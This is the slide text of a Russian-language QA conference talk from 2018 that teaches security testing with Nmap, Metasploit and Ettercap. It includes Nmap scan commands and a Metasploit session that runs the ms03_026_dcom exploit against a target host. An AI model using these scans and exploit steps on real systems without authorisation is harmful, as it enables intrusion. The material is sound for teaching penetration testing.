Ни для кого не секрет, что при разработке проекта мало кто уделяет достаточное внимание проверке безопасности приложения. Даже когда и задумываются об этом, то очень часто упускают из внимания уязвимости железа и ОС, которое коммуницирует с вашим приложением. В своем докладе я расскажу и покажу на что следует обращать внимание при тестировании безопасности вашего продукта. А так же насколько важно применять тестирование безопасности. Ну, и как обычно, свои доклады я сопровождаю не только теорией, но и практическими примерами. На этот раз специальными гостями будут: - Nmap - Metasploit - Ettercap

1. WITH PASSION TO QUALITY
Святослав Логин
QA CONFERENCE #1 IN UKRAINE, KYIV 2018
Что такое Metasploit? Как его использовать
для проверки безопасности проекта?

2. О себе:
- Святослав Логин
- QA Lead в Evo.company
- 5 лет в тестировании
- 6 проектов

3. В evo.company входят такие проекты:

4. Сегодня в программе:
- Metasploit
- Nmap
- Ettercap

5. Вступление Знакомство с инструментами

6. Вступление Вступление: Работа злоумышленников
Hardware
OS
Soft
WEB Сервер

7. Вступление: Что такое Metasploit?
Metasploit - проект, посвященный
информационной безопасности.

8. Вступление: База Exploit
38.000+ EXPLOITS
● OS
● DB
● Soft
● Hardware

9. Вступление: Термины

10. Вступление: Умение Metasploit?
● Проводить установку к shell или VNC cерверу
● Шифровать shellcode, скрывая атаки

11. Вступление: Способы проникновения
Harry!!!
I come in
● Метод черного ящика
● Метод белого ящика

12. Вступление: Ключевые шаги
● Определение цели

13. Вступление: Ключевые шаги
● Выявление уязвимости

14. Вступление: Ключевые шаги
● Эксплуатация уязвимости

15. Вступление: Ключевые шаги
● Отчет

16. Глава1 Сбор информации о цели

17. Глава 1: Способы сбора информации
Нормальный мужик
долго на дороге не валяется
● Пассивный сбор информации

18. Глава 1: Пассивный сбор информации
● Команда whois

19. Глава 1: Пассивный сбор информации
● Команда dig

20. Глава 1: Пассивный сбор информации
● Команда nslookup

21. Глава 1: Способы сбора информации
● Активный сбор информации

22. Глава 1: Активный сбор информации
Nmap - утилита предназначенная для разнообразного
сканирования IP-сетей с любым количеством объектов

23. Глава 1: Активный сбор информации
1.Команда TCP connect [-sT]
1 nmap -sT -p1-20 test.net
2 Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-16 14:55 EET
3 rDNS record for 193.239.68.38: www.test.net
4 PORT STATE SERVICE
5 1/tcp filtered tcpmux
6 2/tcp filtered compressnet
7 3/tcp filtered unknown

24. Глава 1: Активный сбор информации
2.Команда UDP scan [-sU]
1 nmap -sU test.net
2 Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-16 14:55 EET
3 rDNS record for 193.239.68.38: www.test.net
4 Not shown: 999 filtered ports
5 PORT STATE SERVICE
6 80/tcp open http
7 Nmap done: 1 IP address (1 host up) scanned in 5.01 seconds

25. Глава 1: Активный сбор информации
3.Команда ACK scan [-sA]
1 nmap -sА test.net
2 Starting Nmap 5.51SVN ( http://nmap.org ) at 2018-02-16 15:19 EET
3 Nmap scan report for 192.168.56.102
4 Host is up (0.0011s latency).
5 Not shown: 999 filtered ports
6 9001/tcp unfiltered  tor-orport

26. Глава 1: Активный сбор информации
4.Команда -O
1 nmap -O test.net
2 Starting Nmap 5.51SVN ( http://nmap.org ) at 2018-02-16 15:19 EET
3 Nmap scan report for test.net
4 Host is up (0.0014s latency).
5 MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems)
6 Device type: general purpose
7 Running: Microsoft Windows 7

27. Глава 1: Способы сбора информации
● Социальная инженерия

28. Глава2 Эксплуатация уязвимости

29. Глава 3: Эксплуатация
Список команд
- search exploit
- use exploit
- set
- show targets, options

30. Глава 2: Запуск Metasploit
root@slogin: msfconsole

31. Глава 2: Эксплуатация
1.Команда search exploit
1 msf > search ms03_026_dcom
2 Matching Modules
3 ================
4 Name Disclosure Date Rank Description
5 ---- --------------- ---- -----------
6 exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great Microsoft RPC
DCOM

32. Глава 2: Эксплуатация
2.Команда use
1 msf > use exploit/windows/dcerpc/ms03_026_dcom
2 msf exploit(ms03_026_dcom) >

33. Глава 2: Эксплуатация
3.Команда show options
1 msf exploit(ms03_026_dcom) > show options
2 Module options (exploit/windows/dcerpc/ms03_026_dcom):
3 Name Current Setting Required Description
4 ---- --------------- -------- -----------
5 RHOST yes The target address
6 RHOST 125 yes The target port

34. Глава 2: Эксплуатация
4.Команда set
1 msf exploit(ms03_026_dcom) > set RHOST 102.168.56.102
2 RHOST =>102.168.56.102
3 msf exploit(ms03_026_dcom) >

35. Глава 2: Эксплуатация
5.Команда show targets
1 msf exploit(ms03_026_dcom) > show targets
2 Exploit targets:
3 Id Name
4 -- ----
5 0 Windows NT SP3-6a/2000/XP/2003 Universal

36. Глава 3: Примеры
1 msf exploit(ms03_026_dcom) > exploit
2 [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
3 [*] Binding to 4d9f4ab8-7d1c-11cf-861e-
0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ...
4 [*] Bound to 4d9f4ab8-7d1c-11cf-861e-
0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ...
5 [*] Sending exploit ...
6 [*] Exploit completed.

37. Глава3 Практика

39. Глава 3: Цепочка развитий событий Base
DB DBn
OS R file
W file
User
Up user
Net
RAM

40. Глава4

41. Глава 4: Как узнать IP
Ettercap — это приложение для анализа
сетевого трафика, проходящего через интерфейс
компьютера, но с дополнительной
функциональностью.
http://viewdns.info
https://iphostinfo.com/

42. Глава 4: Как узнать IP компа

43. Глава 4: Как узнать IP компа

45. Вывод: Как защититься
● Не позволяйте посторонним лицам иметь доступ в вашу сеть
● Помните об угрозе перехвата пароля
● Используйте VPN
● SSL-сертификаты
● Обновляйте все и вся
● Пользуйтесь лицензированным ПО

46. Вывод: Точка G
Security
Functionality
Usability

47. ● База exploit - https://www.exploit-db.com/
● Nmap - https://nmap.org/man/ru/man-port-scanning-techniques.html
● ettercap - https://www.ettercap-project.org/index.html
Литература:

48. Спасибо за внимание!
Вопросы?
svatogor
svyat.login@gmail.com
https://svyat.tech/

49. QA CONFERENCE #1 IN UKRAINE, KYIV 2018
WITH PASSION TO QUALITY
svyat.login@gmail.com
https://svyat.tech/